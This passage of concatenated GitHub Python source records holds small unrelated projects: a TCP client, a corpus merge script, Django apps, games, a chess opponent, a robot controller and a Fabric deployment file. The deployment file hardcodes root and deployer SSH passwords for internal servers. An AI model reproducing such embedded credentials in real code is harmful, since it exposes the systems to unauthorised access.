socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n ip = '127.0.0.1'\n port = 8005\n address = (ip, port)\n c_socket.connect(address)\n return c_socket\n\n\ndef run_thread(c_socket):\n thread_name = threading.current_thread().getName()\n msg = 'from client and the name of thread is %s' % thread_name\n t = threading.Thread(target=my_thread, args=(msg, c_socket))\n # t.daemon = True\n t.start()\n\n\ndef my_thread(msg, c_socket):\n c_socket.sendall(bytes(msg, encoding='UTF-8'))\n rec_msg = c_socket.recv(1024)\n print(rec_msg)\n c_socket.close()\n\n\nif __name__ 
== \"__main__\":\n for i in range(15):\n run_thread(client_tcp())\n","repo_name":"pxz000git/python-se","sub_path":"module/mysocket/tcp/tcp_client_thread.py","file_name":"tcp_client_thread.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72322870867","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n author: Noémi Vadász\n last update: 2019.10.09.\n\n\"\"\"\nimport csv\nimport sys\n\nXTSV_FIELDS = {'id': '_',\n 'form': '_',\n 'anas': '_',\n 'lemma': '_',\n 'upos': '_',\n 'xpostag': '_',\n 'feats': '_',\n 'deprel': '_',\n 'head': '_',\n 'corefhead': '_',\n 'coreftype': '_'}\n\n\ndef check_fields(lines):\n\n for line in lines:\n if isinstance(line, dict):\n for key, value in line.items():\n print(key, value)\n\n\ndef read_xtsv(infile):\n\n lines = list()\n\n with open(infile) as inf:\n reader = csv.reader(inf, delimiter='\\t', quoting=csv.QUOTE_NONE)\n header = next(reader)\n for line in reader:\n if len(line) > 1:\n fields = dict()\n for field in header:\n fields[field] = line[header.index(field)]\n fields.pop('lemma')\n lines.append(fields)\n else:\n lines.append('')\n\n return lines\n\n\ndef merge_files(xtsv, coref):\n\n zipped = list()\n i = 0\n\n dummy = {'form': 'DUMMY',}\n\n while i < len(coref) and i < len(xtsv):\n\n if isinstance(coref[i], dict) and isinstance(xtsv[i], dict):\n\n if coref[i]['form'].lower() == xtsv[i]['form'].lower():\n allfields = XTSV_FIELDS.copy()\n for feat, val in coref[i].items():\n if feat in allfields:\n allfields[feat] = val\n allfields['anas'] = xtsv[i]['anas']\n allfields['xpostag'] = xtsv[i]['xpostag']\n zipped.append(allfields)\n elif (coref[i]['form'] in ('DROP', 'KOPULA')) or coref[i]['form'].startswith('ZÉRÓ_'):\n allfields = XTSV_FIELDS.copy()\n for feat, val in coref[i].items():\n if feat in allfields:\n allfields[feat] = val\n zipped.append(allfields)\n xtsv.insert(i, dummy)\n elif (xtsv[i]['form'] in ('DROP', 'KOPULA')) or xtsv[i]['form'].startswith('ZÉRÓ_'):\n coref.insert(i, dummy)\n\n else:\n zipped.append('')\n\n i += 1\n\n return zipped\n\n\ndef print_corpus(zipped):\n\n header = '\\t'.join([key for key, value in XTSV_FIELDS.items()])\n print(header)\n\n for line in zipped:\n if isinstance(line, dict):\n fields = '\\t'.join(line[field] for field in line)\n print(fields)\n else:\n print(line)\n\n\ndef main():\n\n xtsv_file = sys.argv[1]\n coref_file = sys.argv[2]\n\n xtsv_lines = read_xtsv(xtsv_file)\n coref_lines = read_xtsv(coref_file)\n\n zipped = merge_files(xtsv_lines, coref_lines)\n\n print_corpus(zipped)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vadno/korkor_pilot","sub_path":"scripts/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"24173844806","text":"import json\n\n\ndef add_stat(yout=0, inst=0, err=0):\n try:\n dict_stat = read_stats()\n except:\n dict_stat = {\n \"yout\": 0,\n \"inst\": 0,\n \"err\": 0\n }\n\n dictionary = {\n \"yout\": yout + int(dict_stat['yout']),\n \"inst\": inst + int(dict_stat['inst']),\n \"err\": err + int(dict_stat['err'])\n }\n\n # Serializing json\n json_object = json.dumps(dictionary, indent=4)\n\n # Writing to sample.json\n with open(\"stats.json\", \"w\") as outfile:\n outfile.write(json_object)\n\n\ndef read_stats():\n # Opening JSON file\n with open('stats.json', 'r') as openfile:\n # Reading from json file\n json_object = 
json.load(openfile)\n return json_object\n","repo_name":"dagstatus/Downloader_tg","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22799577607","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport os.path\nimport codecs\nimport yaml\n\nfrom django.db import models\n\nimport mytest.settings\n\nDEFAULT_ENCODING = 'utf-8'\n\nclass TESTDynamicModelManager(object):\n\n def _create_field(self, id, title, type, length=0):\n \"\"\"\n Создание поля по его описанию.\n \"\"\"\n if type == 'int':\n return models.IntegerField()\n elif type == 'char':\n if length <= 0:\n length = 255\n return models.CharField(max_length=length)\n elif type == 'date':\n return models.DateField()\n\n def load_models(self, sYAMLFileName=None):\n \"\"\"\n Загрузка моделей из файла.\n \"\"\"\n new_models = {}\n models_data = self.load_model_data(sYAMLFileName)\n if models_data:\n for name, struct in models_data.items():\n field_data = struct.get('fields', None)\n fields = {}\n for fld in field_data:\n fields[fld['id']] = self._create_field(**fld)\n meta_opts = struct.get('meta_opts', None)\n new_model = self._create_model(name, fields, meta_opts)\n new_models[name] = new_model\n return models_data, new_models\n\n def load_model_data(self, sYAMLFileName=None):\n \"\"\"\n Загрузка данных моделей из файла.\n \"\"\"\n model_data = None\n if os.path.exists(sYAMLFileName):\n f=None\n try:\n f = codecs.open(sYAMLFileName,'r', DEFAULT_ENCODING)\n try:\n model_data = yaml.load(f)\n except:\n print('ERROR. load %s YAML file' % sYAMLFileName)\n raise\n\n f.close()\n f = None\n except:\n if f:\n f.close()\n f = None\n raise\n else:\n print('WARNING. Not found file %s' % sYAMLFileName)\n return model_data\n\n def _create_model(self, model_name=None, fields=None,\n meta_opts=None, base_model_class=models.Model):\n \"\"\"\n Метод возвращает динамически созданный класс модели с указанным\n именем, набором полей и мета-опций, унаследованный от указанного класса модели.\n \"\"\"\n class Meta:\n # обязательно указываем, к какому приложению принадлежит модель\n app_label = 'mytest'\n db_table = model_name\n\n # Дополняем метакласс переданными опциями\n if meta_opts is not None:\n for key, value in meta_opts.iteritems():\n setattr(Meta, key, value)\n\n # Словарь атрибутов модели\n attrs = {'__module__': self.__class__.__module__,\n 'Meta': Meta,\n 'objects': models.Manager()}\n\n # Добавляем поля к модели\n if fields:\n attrs.update(fields)\n\n # Создаем класс модели\n model = type(model_name, (base_model_class,), attrs)\n\n return model\n\ntry:\n MODEL_MANAGER = TESTDynamicModelManager()\n SCHEME, MODELS = MODEL_MANAGER.load_models(mytest.settings.MODEL_YAML_FILENAME)\n #print('DEBUG. SCHEME: %s MODELS: %s' % (SCHEME, MODELS))\nexcept:\n print('ERROR. Create dynamic models')\n raise\n\n","repo_name":"XHermitOne/my_smyt_test","sub_path":"mytest/mytest/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1264720886","text":"# Write a Python program to play the game Hangman. 
The user needs to guess a secret word\n# by guessing its letters.\n\nprint(\"Welcome to the Hangman game!\")\n\nsecret_word = ['D','U','B','L','I','N']\nblanks = '_' * len(secret_word)\nmistakes = 0\nwhile True:\n    letter = input(\"Enter an uppercase letter \")\n    if letter not in secret_word:\n        # only wrong guesses count as mistakes\n        mistakes += 1\n    for i in range(0, len(secret_word)):\n        if secret_word[i] == letter:\n            new_word = blanks[:i] + secret_word[i] + blanks[i+1:]\n            blanks = new_word\n    if mistakes == 10:\n        print(\"Game Over\")\n        break\n    if list(blanks) == secret_word:\n        print(\"You won Sanja!!!!!!!!!!!!\")\n        break\n    print(blanks)\n\n","repo_name":"spuliz/Python","sub_path":"lab10/list&nestedloops-Hangman.py","file_name":"list&nestedloops-Hangman.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"18992781135","text":"from mainui import Ui_MainWindow\nfrom func import *\nfrom PyQt6.QtWidgets import *\nfrom PyQt6.QtCore import *\nfrom PyQt6.QtGui import *\nimport sys\nimport json\nclass WindowGui(QMainWindow,Ui_MainWindow):\n\n    def __init__(self):\n        super(WindowGui,self).__init__()\n        self.setWindowIcon(QIcon('logo.ico'))\n        self.setupUi(self)\n        self.qsettings = QSettings(\"config.ini\")\n        # doodle (tuya) settings\n        self.tuya_check.setChecked(self.str2bool(self.qsettings.value('tuyaCheckState')))\n        self.tuya_choice.setCurrentIndex(self.qsettings.value('tuyaChoice',type=int))\n        self.tuya_dif.setCurrentIndex(self.qsettings.value('tuyaDif',type=int))\n        self.tuya_times.setText(self.qsettings.value('tuyaTimes'))\n        # fishing settings\n        # print((self.qsettings.value('fishingCheckState')))\n        self.fishing_check.setChecked(self.str2bool(self.qsettings.value('fishingCheckState')))\n        self.fishing_point.setCurrentIndex(self.qsettings.value('fishingPoint',type=int))\n        self.fishing_times.setText(self.qsettings.value('fishingTimes'))\n\n        self.data = None\n        self.load_data.clicked.connect(self.loadData)\n        self.save.clicked.connect(self.saveSettings)\n        self.confirm.clicked.connect(self.taskConfirm)\n\n    def str2bool(self, str):\n        if str == 'true':\n            return True\n        else:\n            return False\n\n    def saveSettings(self):\n        self.qsettings.setValue('tuyaCheckState', self.tuya_check.isChecked())\n        self.qsettings.setValue('fishingCheckState', self.fishing_check.isChecked())\n\n        self.qsettings.setValue(\"tuyaChoice\",self.tuya_choice.currentIndex())\n        self.qsettings.setValue(\"tuyaDif\",self.tuya_dif.currentIndex())\n        self.qsettings.setValue(\"tuyaTimes\",self.tuya_times.text())\n\n        self.qsettings.setValue(\"fishingPoint\",self.fishing_point.currentIndex())\n        self.qsettings.setValue(\"fishingTimes\",self.fishing_times.text())\n\n    def taskConfirm(self):\n        if self.fishing_check.isChecked():\n            diaoyu = Fishing(int(self.fishing_times.text()),self.fishing_point.currentIndex(), self.data)\n            diaoyu.fishing()\n\n        if self.tuya_check.isChecked():\n            tuya = Tuya(self.tuya_choice.currentIndex(), self.tuya_dif.currentIndex(), int(self.tuya_times.text()), self.data)\n            tuya.stuya()\n\n    def loadData(self):\n        try:\n            with open('data.json', 'r', encoding='utf-8') as f:\n                self.data = json.load(f)\n        except:\n            raise FileNotFoundError('config file data.json not found')\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    window = WindowGui()\n    window.show()\n    sys.exit(app.exec())\n","repo_name":"Lorpaves/CatCity-AutoFishing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
+{"seq_id":"26674686765","text":"from django.shortcuts 
import render\nfrom apps.blog import models, forms\n\n\n# Create your views here.\ndef post_list(request):\n posts = models.Post.objects.all().order_by('-created_on')\n\n context = {\n 'posts': posts\n\n }\n\n return render(request, 'post_list.html', context)\n\n\ndef post_detail(request, pk):\n post = models.Post.objects.get(pk=pk)\n\n if request.method == 'POST':\n form = forms.CommentForm(request.POST)\n if form.is_valid():\n comment = models.Comment(author=form.cleaned_data['author'], body=form.cleaned_data['body'], post=post)\n comment.save()\n\n comments = models.Comment.objects.filter(post=post)\n form = forms.CommentForm()\n\n context = {'post': post, 'comments': comments, 'form': form}\n return render(request, 'post_detail.html', context)\n\n\ndef category_post_list(request, category):\n posts = models.Post.objects.filter(categories__name__contains=category).order_by('-created_on')\n\n context = {'category': category, 'posts': posts}\n\n return render(request, 'category_post_list.html', context)\n","repo_name":"Marta99/rp-personal-website-pralab1","sub_path":"apps/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71727758545","text":"# Написать метод count_find_num, который принимает на вход список простых множителей (primesL) и целое число,\r\n# предел (limit), после чего попробуйте сгенерировать по порядку все числа.\r\n# Меньшие значения предела, которые имеют все и только простые множители простых чисел primesL.\r\n\r\nfrom functools import reduce as red\r\n\r\n\r\ndef count_find_num(primesL, limit):\r\n if red(lambda a, b: a * b, primesL) > limit:\r\n return []\r\n result = list()\r\n result.append(red(lambda a, b: a * b, primesL))\r\n for i in primesL:\r\n for prim_fac in result:\r\n prim_fac *= i\r\n while prim_fac <= limit and prim_fac not in result:\r\n result.append(prim_fac)\r\n prim_fac *= i\r\n return [len(result), max(result)]\r\n\r\n\r\nif __name__ == '__main__':\r\n primesL = list(map(int, input().split()))\r\n limit = int(input())\r\n print(count_find_num(primesL, limit))\r\n","repo_name":"Maksim198505/Lection-1","sub_path":"zadanie_5.py","file_name":"zadanie_5.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73247266387","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom fabric.api import env, get, local, put, run\nimport os\nfrom time import sleep\nfrom datetime import datetime\nfrom tempfile import mkdtemp\n\nFILES = []\nEXT = ('py', 'json')\nNO_UPLOAD = ('fabfile.py')\nPRESERVE_FILES = (\n 'conf/collector.json',\n)\n\nAPP_NAME = 'snoopy_oo'\nAPP_PACKAGE = '%s-%s.tbz2' % (APP_NAME,\n datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S'))\nAPP_PATH = '/opt/cyclelogic/%s' % (APP_NAME)\n\nall_files = os.walk('./')\nfor path, dirnames, filenames in all_files:\n for filename in filenames:\n if filename in NO_UPLOAD:\n continue\n else:\n file_extension = filename.split('.')[-1]\n if file_extension in EXT:\n if path[2:]:\n FILES.append('%s/%s' % (path[2:], filename))\n else:\n FILES.append('%s' % (filename))\n\ndef staging():\n env.hosts = ['192.168.23.240']\n env.user = 'deployer'\n env.password = 'deployer'\n\ndef production():\n env.hosts = ['192.168.149.39', '192.168.149.18']\n env.user = 'root'\n env.password = 'Password1'\n\ndef restart():\n run('sudo /etc/init.d/snoopy-collector restart')\n\ndef 
update(is_install=False):\n 'Install the application (?)'\n\n # Copio el proyecto a una carpeta temporal\n tmp_dir = mkdtemp(prefix='%s_' % (APP_NAME))\n local('tar c %s | tar xC %s' % (' '.join(FILES), tmp_dir))\n\n # Copio desde produccion archivos importantes\n if is_install == False:\n for element in PRESERVE_FILES:\n destination = element.replace(element.split('/')[-1], '')\n destination = '%s/%s' % (tmp_dir, destination)\n if not os.path.exists(destination):\n local('mkdir -p %s' % (destination))\n\n get('%s/%s' % (APP_PATH, element), destination)\n\n try:\n local('mv %s/%s.%s %s/%s' % (tmp_dir, element, env.host,\n tmp_dir, element))\n except:\n pass\n\n # Creo paquete del proyecto temporal y subo\n local('cd %s && tar cjf %s *' % (tmp_dir, APP_PACKAGE))\n put('%s/%s' % (tmp_dir, APP_PACKAGE), APP_PACKAGE)\n run('rm -rf %s/*' % (APP_PATH))\n run('tar xjf %s -C %s' % (APP_PACKAGE, APP_PATH))\n\n run('rm %s' % (APP_PACKAGE))\n\n restart()\n\ndef install():\n run('mkdir -p %s' % (APP_PATH))\n\n update(is_install=True)\n","repo_name":"beigna/baserguin","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"15188561693","text":"\"\"\"\n@file evaluate.py\n\nChecking how the model is going to perform.\n\"\"\"\n\n# Initialization\n\nimport os\nfrom Supervised import SupervisedChess as SL\nimport argparse\nimport chess\nfrom GameState import Turn, Castle, GameState, Move\nfrom BitBoard import BitBoard, PieceType, BitBoardsFromFenString, FENParseString, S2I, I2S, Occupier, PIECELABELS\n\n\nclass testModel:\n \"\"\"\n Class to test the Model.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param config: Config to use to control how evaluation should work\n \"\"\"\n parser = argparse.ArgumentParser()\n self.chessClassW = SL(savedModel=\"modelBigBig.ptm\")\n self.chessClassB = SL(savedModel=\"modelBig.ptm\")\n\n def reset(self):\n self.board = None\n self.num_halfmoves = 0\n self.winner = None # type: Winner\n self.turn = None\n self.resigned = False\n self.result = None\n self.board = chess.Board()\n self.myState = GameState.getInitialState()\n self.legalMoves = [\n Move('a2', 'a3'),\n Move('a2', 'a4'),\n Move('b2', 'b3'),\n Move('b2', 'b4'),\n Move('c2', 'c3'),\n Move('c2', 'c4'),\n Move('d2', 'd3'),\n Move('d2', 'd4'),\n Move('e2', 'e3'),\n Move('e2', 'e4'),\n Move('f2', 'f3'),\n Move('f2', 'f4'),\n Move('g2', 'g3'),\n Move('g2', 'g4'),\n Move('h2', 'h3'),\n Move('h2', 'h4'),\n Move('b1', 'a3'),\n Move('b1', 'c3'),\n Move('g1', 'f3'),\n Move('g1', 'h3'),\n ]\n\n def legal_move(self):\n \"\"\"\n Function to get all the legal moves.\n \"\"\"\n # Portion of code before the move is made.\n legal_moves = []\n\n for move in self.board.legal_moves:\n move_str = move.uci()\n start_loc = move_str[:2]\n end_loc = move_str[2:]\n\n my_move = Move(start_loc, end_loc)\n legal_moves.append(my_move)\n\n return legal_moves\n\n def log_move(self, move):\n # Portion of code after the move is made.\n final_move = I2S(move.startLoc) + I2S(move.endLoc)\n final_move = chess.Move.from_uci(final_move)\n self.board.push(final_move)\n\n def play_game(self):\n \"\"\"\n Load the model and check if the model performs better and save the result.\n \"\"\"\n self.reset()\n i = 0\n\n while self.winner is None:\n if i % 2 == 0:\n legal_move = self.legal_move()\n move = self.chessClassW.getMovePreference(\n self.myState, legal_move)\n\n self.log_move(move)\n self.myState = 
move.apply(self.myState)\n\n else:\n\n while(True):\n move = input(\"Enter a move: \")\n if(self.board.is_legal(chess.Move.from_uci(move))):\n break\n else:\n print(\"Invalid Move Try Again\")\n print()\n\n start_loc = move[:2]\n end_loc = move[2:]\n\n my_move = Move(start_loc, end_loc)\n\n self.log_move(my_move)\n self.myState = my_move.apply(self.myState)\n\n self.num_halfmoves += 1\n\n if self.board.result(claim_draw=True) != \"*\":\n if self.winner is None:\n self.result = self.board.result(claim_draw=True)\n if self.result == '1-0':\n self.winner = 1\n elif self.result == '0-1':\n self.winner = -1\n else:\n self.winner = 0.5\n\n print(move)\n print()\n i = i + 1\n\n print(self.result)\n\n # def evaluate_model(self):\n # \"\"\"\n # Given a model, evaluates it by playing a bunch of games against the current model.\n # \"\"\"\n\n\ndef main():\n \"\"\"\n Plays a game against model.\n \"\"\"\n model = testModel()\n model.play_game()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"taylornelms15/cis519chess","sub_path":"opponent.py","file_name":"opponent.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42612113622","text":"#IMPORTS\nimport random\nimport time\nimport json\nimport speech_recognition as sr\nfrom player import Player\nfrom enemy import Enemy\n\n#SHORTHANDS\nrecognizer = sr.Recognizer()\nmicrophone = sr.Microphone()\n\n#each spell has its own json file\n\"\"\"\nFORMAT:\ngame_name -> string\natrribute (aka element) -> string (fire, water, air, earth)\ntier -> int (0-4)\ntype -> string (offense, defense, support)\ndamage -> int (ignored if not offense type)\ndefense_class -> int (1-2, 1 = subtraction, 2 = percentage, nullification is percentage but 100%, ignored if not defense type)\ndefense_value -> int (value to divide or subtract by, ignored if not defense type)\nsupport_class -> int (1-3, 1 = healing, 2 = good effects, 3 = bad effects, ignored if type is not support)\nheal_value -> int (ignored if not support class 1)\neffect -> string (ignored if not good or bad effect support class)\neffect_value -> int (ignored if not support class or not needed)\nbackfire_chance -> int (chance to backfire if not yet mastered)\nmaster_percentage -> int (chance to be mastered upon use)\nmana_consumption -> int (amount of mana consumed)\n\"\"\"\n\n#list of effect\n\"\"\"\nGOOD:\nelemental_equality -> lessens attribute effects\nimmunity -> immune to poison\nstrength -> multiplies damage done\nabestos -> immune to burn\nBAD:\nburn -> does fire damage over time\npoison -> does damage over time\nweakness -> reduces damage done\nelemental_dominance -> maximises attribute effects\n\"\"\"\n\n#GLOBAL VARIABLES\nVALID_SPELLS = [\"small_fireball\", \"water_bullet\", \"cutting_wind\", \"rock_smash\", \"healing_drop\", \"minor_phoenix_heal\", \"nourishing_mud\", \"refreshing_air\"]\nSPELL_DATA = {}\nTHE_PLAYER = Player()\n\n#FUNCTION FOR GETTING A SPOKEN SPELL\ndef getSpokenSpell():\n rawSpeech = \"\"\n\n try:\n with microphone as source:\n recognizer.adjust_for_ambient_noise(source)\n print(\"Ready\")\n audio = recognizer.listen(source)\n\n rawSpeech = recognizer.recognize_google(audio).split(\" \") \n except:\n print(\"Sorry, I couldn't get what you said. 
Please try again.\")\n return getSpokenSpell()\n\n for word in rawSpeech:\n rawSpeech[rawSpeech.index(word)] = word.lower()\n\n #pronunced grim-muah\n if (\" \".join(rawSpeech) == \"open grimoire\"):\n for spell in THE_PLAYER.getusedSpells():\n print(SPELL_DATA[spell][\"game_name\"] + \" (Tier: \" + str(SPELL_DATA[spell][\"tier\"]) + \")\")\n time.sleep(5)\n return getSpokenSpell()\n\n spellName = \"_\".join(rawSpeech)\n \n if not (spellName in VALID_SPELLS):\n print(spellName + \" is not a valid spell. Please try again.\")\n return getSpokenSpell()\n elif (THE_PLAYER.isCastableSpell(spellName)):\n return spellName\n else:\n print(\"You have not unlocked \" + SPELL_DATA[spellName][\"game_name\"] + \" (Tier: \" + str(SPELL_DATA[spellName][\"tier\"]) + \")\" + \" yet. Please try again.\")\n return getSpokenSpell()\n\ndef castSpell(spellName, caster, target = THE_PLAYER):\n if (caster == THE_PLAYER):\n print(\"You cast: \" + SPELL_DATA[spellName][\"game_name\"] + \" (Tier: \" + str(SPELL_DATA[spellName][\"tier\"]) + \")\")\n THE_PLAYER.processSpell(spellName)\n if (target == None):\n return\n else:\n target.processAttack(spellName, caster)\n else:\n print(\"Opponent cast: \" + SPELL_DATA[spellName][\"game_name\"] + \" (Tier: \" + str(SPELL_DATA[spellName][\"tier\"]) + \")\")\n caster.processSpell(spellName)\n THE_PLAYER.processAttack(spellName, caster)\n\n#LOADING SPELLS\nfor spell in VALID_SPELLS:\n with open(\"spells/\" + spell + \".json\", \"r\") as spellFile:\n data = json.load(spellFile)\n SPELL_DATA[spell] = data\n\n#TUTORIAL\nprint(\"Greetings, young mage.\")\ntime.sleep(1)\nans = raw_input(\"skip tutorial? (y/n)\")\nif (ans != \"y\"):\n print(\"Try casting a spell.\")\n castedSpell = getSpokenSpell()\n castSpell(castedSpell, THE_PLAYER, None)\n THE_PLAYER.statsReset()\n time.sleep(1)\n print(\"Well then, I think I'm done here so I'll be off.\")\n time.sleep(1)\n print(\"Try to tier up as quick as possible to be able to use more spells.\")\n time.sleep(1)\n print(\"Feel free to copy your opponent's spells if you are of a higher or equal tier and share the same attribute.\")\n time.sleep(1)\n print(\"Beware of backfires though, at best you will waste your mana, at worse you will be severely inflicted by your own spell!\")\n time.sleep(1)\n print(\"Don't forget, you can always use \\\"Open Grimoire\\\" (grim-muah) to get a list of spells you've used before\")\n time.sleep(10)\n print(\"Good luck!\")\n\n#GAME\nenemyCount = 0\npoints = 0\nwhile (THE_PLAYER.getHealth() > 0):\n THE_ENEMY = Enemy()\n enemyCount += 1\n while ((THE_PLAYER.getHealth() > 0) & (THE_ENEMY.getHealth() > 0)):\n castedSpell = getSpokenSpell()\n castSpell(castedSpell, THE_PLAYER, THE_ENEMY)\n castedSpell = THE_ENEMY.chooseSpell()\n castSpell(castedSpell, THE_ENEMY, THE_PLAYER)","repo_name":"peaceknight05/spellGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27605327310","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File:tuple_stu.py\n@Author:fovegage\n@Contact:fovegage@gmail.com\n@Created Time:2019/8/20 10:14 \n@Version:1.0\n'''\n\n# 在Python中,注意args会对元组进行自动封装\n# 应该注意的是对于单个数据类型,在进行声明元组类型时,我们应该用 逗号 进行声明\na = 4,\nb = (4,)\nprint(a is b)\n\nx = 4, 5\ny = (4, 5)\nprint(x is 
y)\n","repo_name":"fovegage/learn-python","sub_path":"CookBook/数据结构和算法/解压/tuple_stu.py","file_name":"tuple_stu.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"26350151651","text":"\ndef convergencia(x,y,xs,ys,k):\n #Calculo de error\n ex=x-xs\n ey=y-ys\n \n #Control proporcional\n ux=-k*ex\n uy=-k*ey\n\n xx=x+ux #X[1]=X(0)+V*t\n yy=y+uy #Y[1]=Y(0)+V*t\n\n return ex,ey,xx,yy\n\ndef convergencia_xyr1_(x,y,xs,ys,k,xr1,yr1):\n #Potencial atractivo\n ex=x-xs\n ey=y-ys\n ax=-k*ex\n ay=-k*ey\n\n #Potencial repulsivo\n b=((x-xr1)*(x-xr1))+((y-yr1)*(y-yr1))\n r=2\n dbdx=-2*(x-xr1)*(1/b)*(1/b)\n dbdy=-2*(y-yr1)*(1/b)*(1/b)\n\n if b<=(r*r):\n GRx=2*((1/b) -(1/(r*r)))*dbdx\n GRy=2*((1/b) -(1/(r*r)))*dbdy\n else:\n GRx=0\n GRy=0\n\n et=0.01\n RX=-et*GRx\n RY=-et*GRy\n\n #Ley Final\n ux=ax+RX\n uy=ay+RY\n\n #Valores siguientes\n xx=x+ux #X[1]=X(0)+V*t\n yy=y+uy #Y[1]=Y(0)+V*t\n\n return ex,ey,xx,yy","repo_name":"HuberGiron/Robot-uniciclo-Ibero-2","sub_path":"5_Python_particula/02_Convergencia_directa_evitar1/control_robot.py","file_name":"control_robot.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41490563853","text":"from flask import Flask\nimport secrets\napp = Flask(__name__)\n\nbenefits = [\n \"Jurassic park is real\",\n \"You can time travel\",\n \"You can fall asleep whenever you want\",\n]\n\ndrawbacks = [\n \"there's a turtle somewhere in the world, moving toward you at all times, and if it touches you you die\",\n \"you can only wear one shirt for the rest of your life\",\n]\n\n@app.route('/')\ndef make_hypothesis():\n benefit = secrets.choice(benefits)\n drawback = secrets.choice(drawbacks)\n\n return \"{} BUT {}.\".format(benefit, drawback)\n\nif __name__ == '__main__':\n print(\"hello world people!\")\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"ekmixon/servantes","sub_path":"hypothesizer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"3974815040","text":"# @author\n# Ashutosh.Verma\n\n# Problem: https://leetcode.com/problems/add-to-array-form-of-integer/\n\nclass Solution(object):\n def addToArrayForm(self, A, K):\n \"\"\"\n :type A: List[int]\n :type K: int\n :rtype: List[int]\n \"\"\"\n digits=A\n digits=list(map(str,digits))\n x=str(int(''.join(digits))+K)\n ans=[]\n for i in x:\n ans.append(int(i))\n return(ans)\n ","repo_name":"ashutoshv1520/Data-Structures-and-Algorithms","sub_path":"Arrays/Add to Array-Form of Integer.py","file_name":"Add to Array-Form of Integer.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17902109950","text":"# Autor: [loopTree] VGasparini 🎈\n# Nome: Número Perfeito\n# Nível: 1\n# Categoria: INICIANTE\n# URL: https://www.urionlinejudge.com.br/judge/pt/problems/view/1164\n\nn = int(input())\r\nfor i in range(n):\r\n a = []\r\n b = int(input())\r\n for j in range(int(b-1)):\r\n if(b%(j+1) == 0): a.append(j+1)\r\n\r\n if(sum(a)==b): print(b,\"eh perfeito\")\r\n else: print(b,\"nao eh perfeito\")\r\n\n","repo_name":"VGasparini/URIOnline","sub_path":"INICIANTE/1164 - Número Perfeito.py","file_name":"1164 - Número 
Perfeito.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70869543505","text":"import os\n\nfrom pydantic import BaseModel\n\nfrom . import config\n\n\nclass StableDiffusionModel(BaseModel):\n model_id: str\n\n def get_model_dir(self):\n return os.path.join(config.get(\"model_dir\"), self.model_id.replace(\"/\", os.sep))\n\n def get_trt_path(self):\n return os.path.join(\n config.get(\"model_dir\"),\n \"accelerate\",\n \"tensorrt\",\n self.model_id.replace(\"/\", os.sep),\n )\n\n def trt_available(self):\n trt_path = self.get_trt_path()\n necessary_files = [\n \"engine/clip.plan\",\n \"engine/unet.plan\",\n \"engine/vae.plan\",\n \"engine/vae_encoder.plan\",\n \"onnx/clip.opt.onnx\",\n \"onnx/unet.opt.onnx\",\n \"onnx/vae.opt.onnx\",\n \"onnx/vae_encoder.opt.onnx\",\n ]\n for file in necessary_files:\n filepath = os.path.join(trt_path, *file.split(\"/\"))\n if not os.path.exists(filepath):\n return False\n return True\n","repo_name":"umisetokikaze/diffusers-webui-branch-umise","sub_path":"modules/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18023950737","text":"from nose.tools import assert_equal, assert_raises\n\n\nclass TestKnapsack(object):\n\n def test_knapsack_bottom_up(self):\n knapsack = Knapsack()\n assert_raises(TypeError, knapsack.fill_knapsack, None, 